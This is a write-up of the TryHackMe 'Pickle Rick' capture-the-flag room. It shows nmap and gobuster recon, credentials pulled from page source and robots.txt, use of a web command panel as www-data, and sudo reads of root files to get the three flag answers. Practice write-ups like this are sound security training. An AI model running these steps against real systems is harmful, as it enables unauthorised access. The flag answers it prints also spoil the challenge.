tryhackme.com - © TryHackMe
🎯 Target IP: 10.10.150.53
Create a directory for machine on the Desktop and a directory containing the scans with nmap.
This Rick and Morty-themed challenge requires you to exploit a web server and find three ingredients to help Rick make his potion and transform himself back into a human from a pickle.
Deploy the virtual machine on this task and explore the web application: 10.10.150.53
You can also access the web application using the following link: https://10-10-150-53.p.thmlabs.com (this will update when the machine has fully started)
su
echo "10.10.150.53 pickle_rick.thm" >> /etc/hosts
mkdir thm/pickle_rick.thm
cd thm/pickle_rick.thm
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hostsI prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
ping -c 3 pickle_rick.thmPING pickle_rick.thm (10.10.150.53) 56(84) bytes of data.
64 bytes from pickle_rick.thm (10.10.150.53): icmp_seq=1 ttl=63 time=72.8 ms
64 bytes from pickle_rick.thm (10.10.150.53): icmp_seq=2 ttl=63 time=80.6 ms
64 bytes from pickle_rick.thm (10.10.150.53): icmp_seq=3 ttl=63 time=61.8 msSending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix system (probably Linux), while Windows systems usually have a TTL of 128 secs.
Seeing html source page we found this precious info about username
Username: R1ckRul3s
Try to scan open ports is always a good solution:
nmap -p- --open -sS -n -Pn pickle_rick.thm -oG open_portsStarting Nmap 7.60 ( https://nmap.org ) at 2023-06-17 14:30 BST
Nmap scan report for pickle_rick.thm (10.10.150.53)
Host is up (0.066s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:E1:EC:48:00:3F (Unknown)nmap -p22,80 -sS -n -Pn -sV -sC 10.10.150.53Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-17 14:30 BST
Nmap scan report for pickle_rick.thm (10.10.150.53)
Host is up (0.00015s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d0:cf:de:e0:28:b0:c4:60:97:9f:9d:50:2e:35:4c:bd (RSA)
| 256 24:c9:a0:ef:86:7e:1b:78:f8:d4:59:87:ce:cd:61:68 (ECDSA)
|_ 256 c9:dc:d4:4d:b0:ec:16:7d:d6:97:ed:43:3b:6d:a2:80 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
MAC Address: 02:E1:EC:48:00:3F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We know username and IP and we can try to access with SSH port
The authenticity of host '10.10.150.53 (10.10.150.53)' can't be established.
ECDSA key fingerprint is SHA256:OFFPjHbvGX9Hd++AM6ynQflPu+GRjTFQluD10V6Fg1A.
Are you sure you want to continue connecting (yes/no)? yes
PWarning: Permanently added '10.10.150.53' (ECDSA) to the list of known hosts.
[email protected]: Permission denied (publickey).Nothing to do: Permission denied!
We can try to explore potential directory of website using gobuster
gobuster dir -u 10.10.150.53 -w /usr/share/wordlists/dirb/common.txt===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.150.53
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2023/06/17 15:11:25 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/assets (Status: 301)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2023/06/17 15:11:26 Finished
===============================================================We visit /robots.txt and we found this info (maybe password)
/robots.txt
{% hint style="info" %} Wubbalubbadubdub {% endhint %}
Since we didn't find any login pages, let's try using nmap's http-enum script
nmap -p80 --script http-enum 10.10.150.53Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-17 15:18 BST
Nmap scan report for ip-10-10-150-53.eu-west-1.compute.internal (10.10.150.53)
Host is up (0.00015s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /login.php: Possible admin folder
|_ /robots.txt: Robots file
MAC Address: 02:E1:EC:48:00:3F (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.32 secondsGood news, we found login.php page
Inserting user and psw found into index.html source code: R1ckRul3s and robots.txt: Wubbalubbadubdub, we give access!
Now, we have a command panel, where we can launch our commands.
Using whoami we check that we're www-data user, with the ls command we explore the current directory where we find the first flag
Cat command doesn't work, for this reason we use "less" command to read flag
🚩 Flag 1 (Sup3rS3cretPickl3Ingred.txt)
mr. meeseek hair
Reading clue.txt file we found another important info
Exploring file system we found the 2nd ingredient
ls -ah ../../../home/rick
less ../../../home/rick/second ingredients
🚩 Flag 2 (second ingredients)
1 jerry tear
Usually the last flag is in the protected/root folder, we try to find it
sudo ls -ah ../../../root/3rd.txt
sudo less ../../../root/3rd.txt
🚩 Flag 3 (3rd.txt)
fleeb juice